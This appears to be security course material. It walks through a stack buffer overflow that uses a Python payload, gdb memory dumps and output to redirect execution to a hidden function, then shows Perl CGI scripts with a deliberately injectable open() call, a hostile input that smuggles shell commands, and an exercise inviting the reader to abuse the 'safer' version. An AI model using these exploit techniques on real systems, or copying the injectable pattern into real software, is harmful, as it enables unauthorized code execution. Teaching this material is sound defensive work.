0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
?
0x0000000100000e40 <secret1+0>: push %rbp 0x0000000100000e41 <secret1+1>: mov %rsp,%rbp 0x0000000100000e44 <secret1+4>: lea 0x65(%rip),%rdi # 0x100000eb0 0x0000000100000e4b <secret1+11>: callq 0x100000ea4 <dyld_stub_puts> 0x0000000100000e50 <secret1+16>: leaveq 0x0000000100000e51 <secret1+17>: retq
rip 0x000100000e40  rbp 0x4141414141414141  rsp 0x7fff5fbff820  (retq popped the forged return address, so execution is now at secret1+0 and rsp has moved up to 0x7fff5fbff820. That slot holds zeros in the dump: secret1() was entered by a ret rather than a call, so when it returns it pops a 0 as its own return address — the Segmentation fault in the run below.)
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
?
Hello secret1( ) !!!
$ poof
Input: A
You entered A.
$ cat poop
import struct
rip = 0x0000000100000e40
print("A"*24 + struct.pack("<q", rip))
$ python poop | poof
Input: You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N.
You found the secret function No. 1!
Segmentation fault
$

How the payload lines up with the dumps above: the 24 'A' bytes cover string[2] at 0x7fff5fbff800, the 14 bytes of frame padding after it, and the 8-byte saved rbp at 0x7fff5fbff810; the little-endian 8-byte pack of 0x100000e40 (secret1+0) then lands exactly on main()'s return address at 0x7fff5fbff818. Only the first two bytes of that address, 0x40 and 0x0e, are printable ('@' and ^N); the zero bytes that follow terminate the %s in "You entered". The "Segmentation fault" comes after the secret message: secret1() was entered by a ret, not a call, so when it returns it pops the next slot, 0x7fff5fbff820, which is all zeros.

Two caveats. The script is Python 2 (str concatenated with the packed bytes); under Python 3 write bytes explicitly, e.g. sys.stdout.buffer.write(b"A"*24 + struct.pack("<q", rip)). And the attack works only because the addresses on these slides are the same from run to run and nothing guards the return address — a stack-protector canary would abort before main() returns, and PIE/ASLR would turn 0x100000e40 into a guess.
#!/usr/bin/perl
# funky CGI script example -- the DELIBERATELY VULNERABLE version.
#
# $dest stands in for a destination address supplied by the remote user.
# It is interpolated straight into the command string given to open(), and a
# one-argument pipe open hands that string to the shell.  Any shell
# metacharacters in $dest (';', '|', backticks, ...) therefore become extra
# commands run with the web server's privileges -- the next listing shows it.

my $dest = "foo1";                    # pretend this is the destination address from the user
open (MAIL, "| /bin/cat >$dest ");    # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;
#!/usr/bin/perl
# funky CGI script example -- the same script fed a hostile $dest.
#
# The "address" now carries shell metacharacters.  After interpolation the
# command given to open() reads
#     /bin/cat >foo1; echo 'this could be bad!';find . -name '*.c' -print;
# so the shell runs cat, then echo, then find -- the last two chosen by the
# user and executed with whatever privileges the CGI process has.

my $dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";
open (MAIL, "| /bin/cat >$dest ");    # pretend this was a call to sendmail
print MAIL "To: $dest\nFrom: me\n\nHi there!\n";
close MAIL;
#!/usr/bin/perl -w
# Safer version: the command handed to open() is now a constant string, so
# $dest can no longer inject shell commands.
#
# What is still NOT checked: $dest and $content come straight from the command
# line (or, in a CGI, from the user) and are written into the message headers
# and body unvalidated.  sendmail -t takes its recipients from the To:/Cc:/Bcc:
# headers of the message it reads, so an embedded newline in $dest would let
# the caller add header lines of their own.  TODO(review): reject CR/LF and
# restrict $dest to the address characters you expect before it is used.

# (1) quit unless we have the correct number of command-line args
my $num_args = $#ARGV + 1;
if ($num_args != 2) {
    print "\nUsage: name.pl email-address brief-message\n";
    exit;
}

# (2) we got two command line args, so assume it's address
$dest    = $ARGV[0];
$content = $ARGV[1];

my $sendmail = "/usr/sbin/sendmail -t";

# old, injectable form:  open (MAIL,"| /bin/cat >$dest ");
open (MAIL, "|$sendmail") or die "Cannot open sendmail: $!";

print MAIL "To: $dest\n";
print MAIL "From: me\n";
print MAIL "Subject: test\n";
print MAIL "Content-type: text/plain\n\n";
print MAIL $content;
close MAIL;       # note: the close status (did sendmail succeed?) is not checked
Run it with:  ./tryit.pl ccpalmer "Some long message here inside quotes"
Could you find a way to trick the Perl script into mailing you some file that it shouldn't? (Hint: the command string is now constant — look at what the script still passes through unchecked.)